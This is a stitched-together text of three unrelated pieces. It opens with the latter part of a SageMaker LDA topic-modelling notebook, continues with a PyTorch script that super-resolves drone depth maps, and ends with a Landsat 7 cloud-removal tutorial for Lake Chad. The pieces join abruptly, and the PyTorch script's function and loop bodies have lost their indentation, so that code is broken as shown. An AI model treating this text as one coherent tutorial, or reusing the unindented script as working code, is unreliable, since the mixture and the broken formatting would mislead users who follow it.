V = \text{vocabulary size}
$$
These data are based on that used by Griffiths and Steyvers in their paper [Finding Scientific Topics](http://psiexp.ss.uci.edu/research/papers/sciencetopics.pdf). For more information, see the **LDA-Science.ipynb** notebook.
```
print("Generating example data...")
num_documents = 6000
num_topics = 5
known_alpha, known_beta, documents, topic_mixtures = generate_griffiths_data(
num_documents=num_documents, num_topics=num_topics
)
vocabulary_size = len(documents[0])
# separate the generated data into training and tests subsets
num_documents_training = int(0.9 * num_documents)
num_documents_test = num_documents - num_documents_training
documents_training = documents[:num_documents_training]
documents_test = documents[num_documents_training:]
topic_mixtures_training = topic_mixtures[:num_documents_training]
topic_mixtures_test = topic_mixtures[num_documents_training:]
print("documents_training.shape = {}".format(documents_training.shape))
print("documents_test.shape = {}".format(documents_test.shape))
```
## Inspect Example Data
*What does the example data actually look like?* Below we print an example document as well as its corresponding known *topic-mixture*. A topic-mixture serves as the "label" in the LDA model. It describes the ratio of topics from which the words in the document are found.
For example, if the topic mixture of an input document $\mathbf{w}$ is,
$$\theta = \left[ 0.3, 0.2, 0, 0.5, 0 \right]$$
then $\mathbf{w}$ is 30% generated from the first topic, 20% from the second topic, and 50% from the fourth topic. For more information see **How LDA Works** in the SageMaker documentation as well as the **LDA-Science.ipynb** notebook.
Below, we compute the topic mixtures for the first few training documents. As we can see, each document is a vector of word counts from the 25-word vocabulary and its topic-mixture is a probability distribution across the five topics used to generate the sample dataset.
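The mixture semantics above can be sketched numerically: if each topic carries its own word distribution, a document's overall word distribution is the $\theta$-weighted average of those distributions. The matrices below are made-up illustrations, not the notebook's data:

```python
import numpy as np

# topic-word distributions: 2 hypothetical topics over a 3-word vocabulary
beta = np.array([[0.7, 0.2, 0.1],
                 [0.1, 0.1, 0.8]])
theta = np.array([0.25, 0.75])  # document is 25% topic 0, 75% topic 1

# expected word distribution of the document: theta-weighted average of topics
word_dist = theta @ beta
print(word_dist)  # [0.25, 0.125, 0.625] -- still sums to 1
```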
```
print("First training document =\n{}".format(documents[0]))
print("\nVocabulary size = {}".format(vocabulary_size))
print("Known topic mixture of first document =\n{}".format(topic_mixtures_training[0]))
print("\nNumber of topics = {}".format(num_topics))
print("Sum of elements = {}".format(topic_mixtures_training[0].sum()))
```
Later, when we perform inference on the training data set we will compare the inferred topic mixture to this known one.
---
Human beings are visual creatures, so it might be helpful to come up with a visual representation of these documents. In the below plots, each pixel of a document represents a word. The greyscale intensity is a measure of how frequently that word occurs. Below we plot the first few documents of the training set reshaped into 5x5 pixel grids.
```
%matplotlib inline
fig = plot_lda(documents_training, nrows=3, ncols=4, cmap="gray_r", with_colorbar=True)
fig.suptitle("Example Document Word Counts")
fig.set_dpi(160)
```
## Store Data on S3
A SageMaker training job needs access to training data stored in an S3 bucket. Although training can accept data of various formats, we convert the documents to MXNet RecordIO Protobuf format before uploading to the S3 bucket defined at the beginning of this notebook. We do so by making use of the SageMaker Python SDK utility `RecordSerializer`.
```
# convert documents_training to Protobuf RecordIO format
recordio_protobuf_serializer = RecordSerializer()
fbuffer = recordio_protobuf_serializer.serialize(documents_training)
# upload to S3 in bucket/prefix/train
fname = "lda.data"
s3_object = os.path.join(prefix, "train", fname)
boto3.Session().resource("s3").Bucket(bucket).Object(s3_object).upload_fileobj(fbuffer)
s3_train_data = "s3://{}/{}".format(bucket, s3_object)
print("Uploaded data to S3: {}".format(s3_train_data))
```
# Training
***
Once the data is preprocessed and available in a recommended format, the next step is to train our model on the data. There are a number of parameters required by SageMaker LDA for configuring the model and defining the computational environment in which training will take place.
First, we specify a Docker container containing the SageMaker LDA algorithm. For your convenience, a region-specific container is automatically chosen for you to minimize cross-region data communication. Information about the locations of each SageMaker algorithm is available in the documentation.
```
from sagemaker.amazon.amazon_estimator import get_image_uri
# select the algorithm container based on this notebook's current location
region_name = boto3.Session().region_name
container = get_image_uri(region_name, "lda")
print("Using SageMaker LDA container: {} ({})".format(container, region_name))
```
Particular to a SageMaker LDA training job are the following hyperparameters:
* **`num_topics`** - The number of topics or categories in the LDA model.
* Usually, this is not known a priori.
  * In this example, however, we know that the data is generated by five topics.
* **`feature_dim`** - The size of the *"vocabulary"*, in LDA parlance.
  * In this example, this is equal to 25.
* **`mini_batch_size`** - The number of input training documents.
* **`alpha0`** - *(optional)* a measure of how "mixed" the topic-mixtures are.
* When `alpha0` is small the data tends to be represented by one or few topics.
* When `alpha0` is large the data tends to be an even combination of several or many topics.
* The default value is `alpha0 = 1.0`.
In addition to these LDA model hyperparameters, we provide additional parameters defining things like the EC2 instance type on which training will run, the S3 bucket containing the data, and the AWS access role. Note that,
* Recommended instance type: `ml.c4`
* Current limitations:
* SageMaker LDA *training* can only run on a single instance.
* SageMaker LDA does not take advantage of GPU hardware.
* (The Amazon AI Algorithms team is working hard to provide these capabilities in a future release!)
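The effect of `alpha0` can be sketched by sampling topic mixtures from a symmetric Dirichlet whose total concentration is `alpha0` (splitting `alpha0` evenly across topics here is an illustrative assumption):

```python
import numpy as np

rng = np.random.default_rng(42)
num_topics = 5

peak = {}
for alpha0 in (0.1, 100.0):
    # symmetric Dirichlet: total concentration alpha0 split evenly over the topics
    thetas = rng.dirichlet(np.full(num_topics, alpha0 / num_topics), size=1000)
    # average weight of each sample's dominant topic:
    # near 1 for small alpha0 (peaked mixtures),
    # near 1/num_topics for large alpha0 (even mixtures)
    peak[alpha0] = thetas.max(axis=1).mean()
    print(alpha0, round(peak[alpha0], 2))
```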
```
# specify general training job information
lda = sagemaker.estimator.Estimator(
container,
role,
output_path="s3://{}/{}/output".format(bucket, prefix),
train_instance_count=1,
train_instance_type="ml.c4.2xlarge",
sagemaker_session=session,
)
# set algorithm-specific hyperparameters
lda.set_hyperparameters(
num_topics=num_topics,
feature_dim=vocabulary_size,
mini_batch_size=num_documents_training,
alpha0=1.0,
)
# run the training job on input data stored in S3
lda.fit({"train": s3_train_data})
```
If you see the message
> `===== Job Complete =====`
at the bottom of the output logs, then training completed successfully and the output LDA model was stored in the specified output path. You can also view the status of, and information about, a training job using the AWS SageMaker console: click on the "Jobs" tab and select the training job matching the name printed below:
```
print("Training job name: {}".format(lda.latest_training_job.job_name))
```
# Inference
***
A trained model does nothing on its own. We now want to use the model we computed to perform inference on data. For this example, that means predicting the topic mixture representing a given document.
We create an inference endpoint using the SageMaker Python SDK `deploy()` function from the job we defined above. We specify the instance type where inference is computed as well as an initial number of instances to spin up.
```
lda_inference = lda.deploy(
initial_instance_count=1,
instance_type="ml.m4.xlarge", # LDA inference may work better at scale on ml.c4 instances
)
```
Congratulations! You now have a functioning SageMaker LDA inference endpoint. You can confirm the endpoint configuration and status by navigating to the "Endpoints" tab in the AWS SageMaker console and selecting the endpoint matching the endpoint name, below:
```
print("Endpoint name: {}".format(lda_inference.endpoint_name))
```
With this realtime endpoint at our fingertips we can finally perform inference on our training and test data.
We can pass a variety of data formats to our inference endpoint. In this example we will demonstrate passing CSV-formatted data. Other available formats are JSON-formatted, JSON-sparse-formatted, and RecordIO Protobuf. We make use of the SageMaker Python SDK utilities `CSVSerializer` and `JSONDeserializer` when configuring the inference endpoint.
```
lda_inference.serializer = CSVSerializer()
lda_inference.deserializer = JSONDeserializer()
```
We pass some test documents to the inference endpoint. Note that the serializer and deserializer will automatically take care of the datatype conversion from Numpy NDArrays.
```
results = lda_inference.predict(documents_test[:12])
print(results)
```
It may be hard to see but the output format of SageMaker LDA inference endpoint is a Python dictionary with the following format.
```
{
'predictions': [
{'topic_mixture': [ ... ] },
{'topic_mixture': [ ... ] },
{'topic_mixture': [ ... ] },
...
]
}
```
We extract the topic mixtures, themselves, corresponding to each of the input documents.
```
computed_topic_mixtures = np.array(
[prediction["topic_mixture"] for prediction in results["predictions"]]
)
print(computed_topic_mixtures)
```
If you decide to compare these results to the known topic mixtures generated in the [Obtain Example Data](#ObtainExampleData) Section, keep in mind that SageMaker LDA discovers topics in no particular order. That is, the approximate topic mixtures computed above may be permutations of the known topic mixtures corresponding to the same documents.
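The `match_estimated_topics` helper imported earlier presumably handles this alignment; as an illustration of the idea, a brute-force sketch (factorial in the number of topics, so only viable for small topic counts) is:

```python
import itertools
import numpy as np

def best_permutation(known, inferred):
    """Reorder inferred topic columns to best match known (brute force)."""
    k = known.shape[1]
    best, best_err = None, np.inf
    for perm in itertools.permutations(range(k)):
        err = np.abs(known - inferred[:, list(perm)]).sum()
        if err < best_err:
            best, best_err = perm, err
    return inferred[:, list(best)]

known = np.array([[0.3, 0.2, 0.5]])
inferred = np.array([[0.5, 0.3, 0.2]])     # same mixture, topics permuted
print(best_permutation(known, inferred))   # recovers [[0.3, 0.2, 0.5]]
```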
```
print(topic_mixtures_test[0]) # known test topic mixture
print(computed_topic_mixtures[0]) # computed topic mixture (topics permuted)
```
## Stop / Close the Endpoint
Finally, we should delete the endpoint before we close the notebook.
To do so, execute the cell below. Alternatively, you can navigate to the "Endpoints" tab in the SageMaker console, select the endpoint with the name stored in the variable `endpoint_name`, and select "Delete" from the "Actions" dropdown menu.
```
sagemaker.Session().delete_endpoint(lda_inference.endpoint_name)
```
# Epilogue
---
In this notebook we,
* generated some example LDA documents and their corresponding topic-mixtures,
* trained a SageMaker LDA model on a training set of documents,
* created an inference endpoint,
* used the endpoint to infer the topic mixtures of a test input.
There are several things to keep in mind when applying SageMaker LDA to real-world data such as a corpus of text documents. Note that input documents to the algorithm, both in training and inference, need to be vectors of integers representing word counts. Each index corresponds to a word in the corpus vocabulary. Therefore, one will need to "tokenize" the corpus vocabulary.
$$
\text{"cat"} \mapsto 0, \; \text{"dog"} \mapsto 1, \; \text{"bird"} \mapsto 2, \ldots
$$
Each text document then needs to be converted to a "bag-of-words" format document.
$$
w = \text{"cat bird bird bird cat"} \quad \longmapsto \quad w = [2, 0, 3, 0, \ldots, 0]
$$
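The tokenization and bag-of-words conversion above can be sketched as follows. This toy version builds the vocabulary from the corpus itself; a real pipeline would more likely use a library utility such as scikit-learn's `CountVectorizer`:

```python
import numpy as np

corpus = ["cat bird bird bird cat", "dog cat dog"]

# tokenize: map each distinct word in the corpus to an integer index
vocab = {w: i for i, w in enumerate(sorted({w for doc in corpus for w in doc.split()}))}

# bag-of-words: one integer count vector per document
def to_bow(doc):
    counts = np.zeros(len(vocab), dtype=int)
    for w in doc.split():
        counts[vocab[w]] += 1
    return counts

bow = np.array([to_bow(doc) for doc in corpus])
print(vocab)  # {'bird': 0, 'cat': 1, 'dog': 2}
print(bow)    # [[3 2 0], [0 1 2]]
```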
Also note that many real-world applications have large vocabulary sizes. It may be necessary to represent the input documents in sparse format. Finally, the use of stemming and lemmatization in data preprocessing provides several benefits. Doing so can improve training and inference compute time since it reduces the effective vocabulary size. More importantly, though, it can improve the quality of learned topic-word probability matrices and inferred topic mixtures. For example, the words *"parliament"*, *"parliaments"*, *"parliamentary"*, *"parliament's"*, and *"parliamentarians"* are all essentially the same word, *"parliament"*, but with different inflections. For the purposes of detecting topics, such as a *"politics"* or *"government"* topic, including all five adds little value since they all essentially describe the same feature.
```
from __future__ import print_function
import argparse
import os
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from data import get_eval_set
from functools import reduce
import scipy.io as sio
import time
import imageio
import os
import numpy as np
from PIL import Image
import scipy.signal
from pmpanet_x8 import Net as PMBAX8
def downsample(ar,factor):
kernel = np.full((factor,factor),1/(factor**2))
ar = scipy.signal.convolve2d(np.asarray(ar),kernel,mode='full')
ar = ar[factor-1::factor,factor-1::factor]
return ar
current_dir = os.getcwd()
direct = os.path.abspath(os.path.join(current_dir, os.pardir))
directory = direct+'/Data_preprocessing'
# Create folder of png for the lr depth
# rgb_dir = directory+'/EPFL_nadir/rgb/'
# rgb_dir = directory+'/EPFL_oblique/rgb/'
# rgb_dir = directory+'/comballaz_nadir/rgb/'
rgb_dir = directory+'/comballaz_oblique/rgb/'
_files = os.listdir(rgb_dir)
_files.sort()
_rgb_files = [rgb_dir + f for f in _files]
_rgb_files.sort()
print(len(_rgb_files))
# dist_dir = directory+'/EPFL_nadir/dist/'
# dist_dir = directory+'/EPFL_oblique/dist/'
# dist_dir = directory+'/comballaz_nadir/dist/'
dist_dir = directory+'/comballaz_oblique/dist/'
_files = os.listdir(dist_dir)
_files.sort()
_dist_files = [dist_dir + f for f in _files]
_dist_files.sort()
print(len(_dist_files))
for num in range(len(_dist_files)):
dist_img = torch.load(_dist_files[num])
dist_img = dist_img.detach().cpu().numpy()
down_img = downsample(dist_img,8)
temp = np.zeros((136,160))
temp[:60,:90] = down_img
print(temp.shape)
im = Image.fromarray(temp)
im = im.convert('L')
# im.save(directory+'/EPFL_nadir/distpng/'+str(num)+'.png')
# im.save(directory+'/EPFL_oblique/distpng/'+str(num)+'.png')
# im.save(directory+'/comballaz_nadir/distpng/'+str(num)+'.png')
im.save(directory+'/comballaz_oblique/distpng/'+str(num)+'.png')
rgb_img = imageio.imread(_rgb_files[num])
temp2 = np.zeros((1088,1280,3))
temp2[:480,:720,:] = rgb_img
print(temp2.shape)
# imageio.imsave(directory+'/EPFL_nadir/rgbpng/'+str(num)+'.png',temp2)
# imageio.imsave(directory+'/EPFL_oblique/rgbpng/'+str(num)+'.png',temp2)
# imageio.imsave(directory+'/comballaz_nadir/rgbpng/'+str(num)+'.png',temp2)
imageio.imsave(directory+'/comballaz_oblique/rgbpng/'+str(num)+'.png',temp2)
def save_img(img, img_name):
save_img = img.squeeze().clamp(0, 1).numpy()
save_dir=os.path.join(opt.output,opt.test_dataset)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_fn = save_dir +'/'+ img_name
imageio.imwrite(save_fn,save_img*255)
# # Testing settings EPFL nadir
# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
# parser.add_argument('--upscale_factor', type=int, default=8, help="super resolution upscale factor")
# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
# parser.add_argument('--gpu_mode', type=bool, default=False)
# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')
# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')
# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')
# parser.add_argument('--input_dir', type=str, default=directory)
# parser.add_argument('--output', default='/EPFL_nadir/Results/', help='Location to save checkpoint models')
# parser.add_argument('--test_dataset', type=str, default='/EPFL_nadir/distpng/')
# parser.add_argument('--test_rgb_dataset', type=str, default='/EPFL_nadir/rgbpng/')
# parser.add_argument('--model_type', type=str, default='PMBAX8')
# parser.add_argument('--model', default="./pre_train_model/PMBA_color_x8.pth", help='pretrained x8 model')
# opt = parser.parse_args("")
# gpus_list=range(opt.gpus)
# print(opt)
# # Testing settings EPFL oblique
# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
# parser.add_argument('--upscale_factor', type=int, default=8, help="super resolution upscale factor")
# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
# parser.add_argument('--gpu_mode', type=bool, default=False)
# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')
# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')
# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')
# parser.add_argument('--input_dir', type=str, default=directory)
# parser.add_argument('--output', default='/EPFL_oblique/Results/', help='Location to save checkpoint models')
# parser.add_argument('--test_dataset', type=str, default='/EPFL_oblique/distpng/')
# parser.add_argument('--test_rgb_dataset', type=str, default='/EPFL_oblique/rgbpng/')
# parser.add_argument('--model_type', type=str, default='PMBAX8')
# parser.add_argument('--model', default="./pre_train_model/PMBA_color_x8.pth", help='pretrained x8 model')
# opt = parser.parse_args("")
# gpus_list=range(opt.gpus)
# print(opt)
# # Testing settings comballaz nadir
# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
# parser.add_argument('--upscale_factor', type=int, default=8, help="super resolution upscale factor")
# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
# parser.add_argument('--gpu_mode', type=bool, default=False)
# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')
# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')
# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')
# parser.add_argument('--input_dir', type=str, default=directory)
# parser.add_argument('--output', default='/comballaz_nadir/Results/', help='Location to save checkpoint models')
# parser.add_argument('--test_dataset', type=str, default='/comballaz_nadir/distpng/')
# parser.add_argument('--test_rgb_dataset', type=str, default='/comballaz_nadir/rgbpng/')
# parser.add_argument('--model_type', type=str, default='PMBAX8')
# parser.add_argument('--model', default="./pre_train_model/PMBA_color_x8.pth", help='pretrained x8 model')
# opt = parser.parse_args("")
# gpus_list=range(opt.gpus)
# print(opt)
# Testing settings comballaz oblique
parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
parser.add_argument('--upscale_factor', type=int, default=8, help="super resolution upscale factor")
parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
parser.add_argument('--gpu_mode', type=bool, default=False)
parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')
parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')
parser.add_argument('--gpus', default=1, type=float, help='number of gpu')
parser.add_argument('--input_dir', type=str, default=directory)
parser.add_argument('--output', default='/comballaz_oblique/Results/', help='Location to save checkpoint models')
parser.add_argument('--test_dataset', type=str, default='/comballaz_oblique/distpng/')
parser.add_argument('--test_rgb_dataset', type=str, default='/comballaz_oblique/rgbpng/')
parser.add_argument('--model_type', type=str, default='PMBAX8')
parser.add_argument('--model', default="./pre_train_model/PMBA_color_x8.pth", help='pretrained x8 model')
opt = parser.parse_args("")
gpus_list=range(opt.gpus)
print(opt)
cuda = opt.gpu_mode
if cuda and not torch.cuda.is_available():
    raise Exception("No GPU found; run with gpu_mode set to False")
torch.manual_seed(opt.seed)
if cuda:
    torch.cuda.manual_seed(opt.seed)
print('===> Loading datasets')
test_set = get_eval_set(os.path.join(opt.input_dir,opt.test_dataset),os.path.join(opt.input_dir,opt.test_rgb_dataset))
testing_data_loader = DataLoader(dataset=test_set, batch_size=opt.testBatchSize, shuffle=False)
print('===> Building model')
if opt.model_type == 'PMBAX8':
    model = PMBAX8(num_channels=1, base_filter=64, feat = 256, num_stages=3, scale_factor=opt.upscale_factor) ##For NTIRE2018
else:
    model = PMBAX8(base_filter=64, feat = 256, num_stages=5, scale_factor=opt.upscale_factor) ###D-DBPN
####
if cuda:
    model = torch.nn.DataParallel(model, device_ids=gpus_list)
if os.path.exists(opt.model):
    model.load_state_dict(torch.load(opt.model, map_location=lambda storage, loc: storage))
    print('Pre-trained x8 model is loaded.')
if cuda:
    model = model.cuda(gpus_list[0])
model.eval()
torch.set_grad_enabled(False)
for batch in testing_data_loader:
    # Variable/volatile are deprecated; gradients are already disabled above via torch.set_grad_enabled(False)
    input_i, input_rgb, name = batch[0], batch[1], batch[2]
    if cuda:
        input_i = input_i.cuda(gpus_list[0])
        input_rgb = input_rgb.cuda(gpus_list[0])
    t0 = time.time()
    prediction = model(input_rgb, input_i)
    t1 = time.time()
    print("===> Processing: %s || Timer: %.4f sec." % (name[0], (t1 - t0)))
    save_img(prediction.cpu().data, name[0])
```
```
# Enable importing of utilities
import sys
sys.path.append('..')
%matplotlib inline
```
# Cleaning up imagery for pre and post rainy season
The [previous tutorial](igarrs_chad_01.ipynb) addressed identifying the extent of the rainy season near Lake Chad. This tutorial focuses on cleaning up optical imagery to make it suitable for water-detection algorithms.
<br>
# What to expect from this notebook
- Introduction to Landsat 7 data
- Basic xarray manipulations
- Removing clouds and scanline errors using `pixel_qa`
- Building a composite image
- Saving products
<br>
# Algorithmic process
<br>

<br>
The algorithmic process is fairly simple. It is a composable chain of operations on Landsat 7 imagery. The goal is to create a **scanline-free** and **cloud-free** representation of the data for the **pre** and **post** rainy season segments of 2015. The process is outlined as follows:
1. load Landsat imagery for 2015
2. isolate pre and post rainy season data
3. remove clouds and scan-line errors from pre and post rainy season data
4. build a cloud-free composite for pre and post rainy season data
5. export the data for future use
What scanline-free or cloud-free means will be addressed later in the tutorial. To understand everything, just follow the steps in sequence.
# Creating a Datacube Object
<br>
The following code connects to the datacube and accepts `cloud_removal_in_chad` as an app-name. The app name is typically only used in logging and debugging.
<br>
```
import datacube
dc = datacube.Datacube(app = "cloud_removal_in_chad")
```
<br>
Like in the previous tutorial, the datacube object will be used to load data that has previously been ingested by the datacube.
<br>
## Defining the boundaries of the area and restricting measurements
```
## Define Geographic boundaries using a (min,max) tuple.
latitude = (12.75, 13.0)
longitude = (14.25, 14.5)
## Specify a date range using a (min,max) tuple
from datetime import datetime
time = (datetime(2015,1,1), datetime(2016,1,1))
## define the name you gave your data while it was being "ingested", as well as the platform it was captured on.
platform = 'LANDSAT_7'
product = 'ls7_ledaps_lake_chad_full'
measurements = ['red', 'green', 'blue', 'nir', 'swir1', 'swir2','pixel_qa']
```
As a reminder and in-notebook reference, the following line of code displays the extents of the study area. Re-orient yourself with it.
```
from utils.data_cube_utilities.dc_display_map import display_map
display_map(latitude = (12.75, 13.0),longitude = (14.25, 14.5))
```
<br>
## Loading in Landsat 7 imagery
The following code loads in landsat 7 imagery using the constraints defined above
```
#Load Landsat 7 data using parameters,
landsat_data = dc.load(latitude = latitude,
longitude = longitude,
time = time,
product = product,
platform = platform,
measurements = measurements)
```
<a id='#intro_ls7'></a>
# Explore the Landsat 7 dataset
The previous tutorial barely grazed the concept of xarray variables.
To understand how we use Landsat 7 imagery, it will be necessary to make a brief detour and explain them in greater detail.
<br>
### xarray - Variables & Data-arrays
When you output the contents of your loaded dataset...
```
print(landsat_data)
```
<br>
.. you should notice a list of values called data-variables.
<br>
These 'variables' are really 3-dimensional [data-arrays](http://xarray.pydata.org/en/stable/data-structures.html) housing values such as 'red', 'green', 'blue', and 'nir' for each lat, lon, time coordinate in your dataset. Think of an [xarray.Dataset](http://xarray.pydata.org/en/stable/data-structures.html#dataset) as an object that houses many different types of data under a shared coordinate system.
<br>

<br>
If you wish to fetch certain data from your dataset, you can call it by its variable name. So if, for example, you wanted to get the near-infrared data-array from the dataset, you would just index it like so:
<br>
```
landsat_data.nir
```
<br>
The object printed above is a [data-array](http://xarray.pydata.org/en/stable/generated/xarray.DataArray.html). Unlike a dataset, a data-array houses only one type of data and has its own set of attributes and functions.
<br>
### xarray - Landsat 7 Values
Let's explore landsat datasets in greater detail by starting with some background about what sort of data landsat satellites collect...
In layman's terms, Landsat satellites observe light that is reflected or emitted from the surface of the Earth.
<br>

<br>
In Landsat, the spectrum of observable light is split into smaller sections such as 'red', 'green', 'blue', 'thermal', and 'infrared'.
Each of these sections has a value denoting how much of that light was reflected from each pixel. The dataset we've loaded contains values for each of these sections in separate data-arrays under a shared dataset.
The ones used in this series of notebooks are:
- `red`
- `green`
- `blue`
- `nir` - near infrared
- `swir1` - short-wave infrared band 1
- `swir2` - short-wave infrared band 2
There is one additional band attached to the Landsat 7 xarray dataset, pixel qa:
- `pixel_qa` - land cover classifications
### Taking a look at landsat data taken on July 31st, 2015
The data listed above can be used in conjunction to display a visual readout of the area. The code below will use our `red`, `green`, and `blue` values to produce a **png** of one of our time slices.
```
## The only take-away from this code should be that a .png is produced.
## Any details about how this function is used are out of scope for this tutorial
from utils.data_cube_utilities.dc_utilities import write_png_from_xr
write_png_from_xr('../demo/landsat_rgb.png', landsat_data.isel(time = 11), ["red", "green", "blue"], scale = [(0,2000),(0,2000),(0,2000)])
```

# The need to clean up imagery
Considering the imagery above, it is hard to build a comprehensive profile of the land cover. Several artifacts occlude the surface of the Earth: errors introduced by the SLC malfunction, as well as cloud cover.
### Scanline Gaps
In May 2003, Landsat 7's scan line corrector (SLC) failed. This renders several horizontal rows of imagery unusable for analysis. Luckily, these scanline gaps don't always appear in the same spots. With enough imagery, a "gap-less" representation can be constructed that we can use to analyze the pre and post rainy seasons.
<br>

<br>
### Cloud occlusion
Clouds get in the way of analyzing/observing the surface reflectance values of Lake Chad. Fortunately, like SLC gaps, clouds don't always appear in the same spot. With enough imagery, taken at close enough intervals, a "cloudless" representation of the area can be built for pre and post rainy season acquisitions of the region.
<br>

<br>
>**Strong Assumptions**
>In this analysis, strong assumptions are made about the variability of lake size over the span of a few acquisitions (namely, that the size before the rainy season won't vary as much as it does after the rainy season contributes to the surface area of the lake).
# Cleaning up Pre and Post rainy season Imagery
### Splitting the dataset in two
The first step in cleaning up pre and post rainy season imagery is to split our year's worth of acquisitions into two separate datasets. In the previous notebook, we discovered that an appropriate boundary for the rainy season is sometime between June and October. For the sake of this notebook, we'll choose the first day of both months.
<br>
```
start_of_rainy_season = '2015-06-01'
end_of_rainy_season = '2015-10-01'
```
<br>
The next step is to define the time ranges for both pre and post, then use them to select subsections of the original dataset as two separate datasets (as in the diagram below).
<br>

<br>
```
start_of_year = '2015-01-01'
end_of_year = '2015-12-31'
pre = landsat_data.sel(time = slice(start_of_year, start_of_rainy_season))
post = landsat_data.sel(time = slice(end_of_rainy_season, end_of_year))
```
<br>
# Building a cloud-free and gap-free representation
This part of the process works by masking out clouds and gaps from the imagery and then selecting the median value of the cloud-free, scanline-gap-free pixels of an image.

<br>
- Masking is done using the **pixel_qa** variable.
- The gap/cloud-free compositing is done using a technique called **median-pixel-mosaicing**
<br>
### Masking out clouds and SLC gaps using `pixel_qa`
We're going to be using one of our loaded values called `pixel_qa` for the masking step.
`pixel_qa` doesn't convey surface reflectance intensities. Instead, it is a band that contains more abstract information for each pixel. It places a pixel under one or more of the following categories:
- `clear` - pixel is likely normal landcover
- `water` - pixel is likely water
- `cloud_shadow` - pixel is likely in the shadow of a cloud
- `snow` - the pixel is likely snowy
- `cloud` - the pixel is likely cloudy
- `fill` - the pixel is classified as not fit for analysis (SLC gaps fall into this classification)
We will use these classifications to mask out values unsuitable for analysis.
### A Masking Function
The masking step will have to make use of a very peculiar encoding for each category.
<br>
\begin{array}{|c|c|c|c|}
\hline bit & value & sum & interpretation \\\hline
0 & 1 & 1 & Fill \\\hline
1 & 2 & 3 & Clear \\\hline
2 & 4 & 7 & Water \\\hline
3 & 8 & 15 & Cloud Shadow \\\hline
4 & 16 & 31 & Snow \\\hline
5 & 32 & 63 & Cloud \\\hline
6 & 64 & 127 & Cloud Confidence \\
&&& 00 = None \\
7& 128& 255 & 01 = Low \\
&&& 10 = Med \\
&&& 11 = High \\\hline
\end{array}
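As a quick illustration of the encoding above, here is a small sketch (the helper and names are ours, not part of the datacube API) that decodes a `pixel_qa` value into its category flags using bitwise tests:

```python
# Bit values taken from the table above; the helper itself is illustrative only.
FLAGS = {"fill": 1, "clear": 2, "water": 4,
         "cloud_shadow": 8, "snow": 16, "cloud": 32}

def decode_pixel_qa(value):
    """Return the list of category flags set in a pixel_qa value."""
    return [name for name, bit in FLAGS.items() if value & bit]

print(decode_pixel_qa(2 + 64))  # the 'clear' comparison value used below
```

The value `2 + 64` combines the clear bit with the cloud-confidence bit, which is why it appears in the masking function that follows.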
<br>
The following function was constructed to mask out anything that isn't **clear** or **water**.
<br>
```
import numpy as np
def cloud_and_slc_removal_mask(dataset):
    # Create boolean masks for clear and water pixels
    clear_pixels = dataset.pixel_qa.values == 2 + 64   # clear bit + cloud-confidence bit
    water_pixels = dataset.pixel_qa.values == 4 + 64   # water bit + cloud-confidence bit
    a_clean_mask = np.logical_or(clear_pixels, water_pixels)
    return a_clean_mask
```
<br>
The following code creates a **boolean** mask for each season's dataset.
<br>
```
mask_for_pre = cloud_and_slc_removal_mask(pre)
mask_for_post = cloud_and_slc_removal_mask(post)
```
<br>
A boolean mask is essentially what it sounds like. Let's look at its print-out
<br>
```
print(mask_for_post)
```
<br>
This boolean mask contains a **true** value for pixels that are clear and un-occluded by clouds or scanline gaps and **false** values where the opposite is true.
<br>
### Example of mask use
There are many ways to apply a mask. The following example is the xarray way. It will apply *nan* values to areas with clouds or scanline issues:
<br>
```
pre.where(mask_for_pre)
```
Notice that many of the values in the array above are nan. Compositing algorithms like the **median-pixel mosaic** below make use of this **where** function, with nan as the marker for no-data values.
<br>
### Median Pixel Mosaic
A median pixel mosaic is used as our cloud/SLC-gap free representation of the satellite imagery. It works by masking out clouds and SLC gaps from the imagery, then taking the median of the remaining clear pixels in the time series at each lat-lon coordinate.
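The idea can be sketched in a few lines of plain numpy (the shapes and values below are made up; the real implementation is `create_median_mosaic`):

```python
import numpy as np

# A 3-acquisition time series over a 1x2 pixel grid.
stack = np.array([[[10., 12.]],
                  [[100., 11.]],   # 100. stands in for a cloudy pixel
                  [[12., 13.]]])
# True where the pixel is clear, False where it is occluded.
mask = np.array([[[True, True]],
                 [[False, True]],
                 [[True, False]]])

masked = np.where(mask, stack, np.nan)  # occluded pixels become NaN
mosaic = np.nanmedian(masked, axis=0)   # per-pixel median over time
print(mosaic)
```

The occluded value never influences the composite because `nanmedian` ignores NaNs at each pixel.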
<br>

Here is a function we can use to build our mosaic. Its exact mechanics are abstracted away from this tutorial and can be explored in further detail by visiting [our github](https://github.com/ceos-seo/data_cube_utilities/blob/master/dc_mosaic.py).
<br>
```
from utils.data_cube_utilities.dc_mosaic import create_median_mosaic
def mosaic(dataset, mask):
    return create_median_mosaic(dataset, clean_mask = mask)
```
<br>
Let's use it to generate our cloud-free representations of the area:
<br>
```
clean_pre = mosaic(pre, mask_for_pre)
clean_post = mosaic(post, mask_for_post)
```
<br>
# Taking a peek at our cloud-free composites
<br>
### Pre Rainy Season
```
print(clean_pre)
write_png_from_xr('../demo/pre_rain_mosaic.png', clean_pre, ["red", "green", "blue"], scale = [(0,2000),(0,2000),(0,2000)])
```
Your png should look something like this:

### Post Rainy Season
```
print(clean_post)
write_png_from_xr('../demo/post_rain_mosaic.png', clean_post, ["red", "green", "blue"], scale = [(0,2000),(0,2000),(0,2000)])
```

# Next Steps
